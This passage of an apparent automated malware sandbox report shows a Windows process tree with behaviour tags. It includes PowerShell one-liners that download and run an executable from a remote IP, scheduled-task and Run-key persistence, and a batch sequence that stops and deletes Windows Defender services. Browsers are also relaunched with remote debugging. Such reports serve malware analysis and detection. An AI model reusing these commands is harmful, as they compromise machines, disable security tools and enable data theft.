- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:3248
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
PID:2032
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exeC:\Users\Admin\AppData\Local\Temp\SysUpdate\bot.exe9⤵PID:7660
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe10⤵PID:4028
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe11⤵PID:7348
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe12⤵PID:7596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe13⤵PID:1616
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe14⤵PID:7772
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe15⤵PID:7912
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe16⤵PID:6308
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe17⤵PID:7948
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe18⤵PID:8096
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe19⤵PID:1872
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe20⤵PID:6596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe21⤵PID:4604
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe22⤵PID:6680
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe23⤵PID:6708
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe24⤵PID:6764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe25⤵PID:6832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe26⤵PID:6876
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe27⤵PID:6952
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe28⤵PID:7020
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe29⤵PID:7100
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe30⤵PID:5668
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe31⤵PID:4068
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe32⤵PID:5428
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe33⤵PID:1848
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe34⤵PID:7272
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe35⤵PID:7332
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe36⤵PID:7288
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe37⤵PID:7436
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe38⤵PID:4028
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe39⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe40⤵PID:4796
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe41⤵PID:3724
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe42⤵PID:4640
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe43⤵PID:7820
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe44⤵PID:7940
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe45⤵PID:5596
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe46⤵PID:8040
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe47⤵PID:6372
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe48⤵PID:5052
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"49⤵
- Modifies registry key
PID:4912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe\"'"49⤵
- Command and Scripting Interpreter: PowerShell
PID:1816
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"8⤵PID:212
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"8⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043810101\297cff0654.exe"9⤵PID:7272
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"8⤵PID:6916
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043820101\53ec6f7213.exe"9⤵PID:18712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6020 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBBA.tmp\DBBB.tmp\DBBC.bat C:\Users\Admin\AppData\Local\Temp\22.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DCC3.tmp\DCC4.tmp\DCC5.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5800 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4552
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:3556
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3240
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4748
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1192
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5496
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2912
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:3928
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4776
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:4260
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5512
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:6044
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:3764
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:4896
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:3568
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:4912
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:5784
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:4732
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1076
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3400
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:844
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:4540
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5680
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1012
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:5376
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:548
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:852
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:5060
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1680
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:5864
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:1188
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:712
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:3460
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:5504
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1372
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:5468
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:5824
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:3520
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:5768
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:5664
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3416
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2420
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2948
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe"C:\Users\Admin\AppData\Local\Temp\10367620101\accde9cdf4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn yIiflmaurRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2160
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\6ImH8ZvBV.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436 -
C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE"C:\Users\Admin\AppData\Local\TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10367630121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "I46PkmaDWJp" /tr "mshta \"C:\Temp\ESZPJoGnb.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3544
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ESZPJoGnb.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe"C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe"C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe"6⤵PID:4460
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
PID:2208 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x84,0xfc,0x100,0xd8,0x104,0x7ffe3016dcf8,0x7ffe3016dd04,0x7ffe3016dd108⤵PID:3884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1768,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2120 /prefetch:38⤵PID:4820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2088 /prefetch:28⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2312 /prefetch:88⤵PID:3104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2980,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2996 /prefetch:18⤵
- Uses browser remote debugging
PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3000,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3028 /prefetch:18⤵
- Uses browser remote debugging
PID:4276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4228 /prefetch:28⤵
- Uses browser remote debugging
PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4436,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4420 /prefetch:18⤵
- Uses browser remote debugging
PID:2912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5164,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5176 /prefetch:88⤵PID:5616
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
PID:4752 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffe3918f208,0x7ffe3918f214,0x7ffe3918f2208⤵PID:3532
-
-
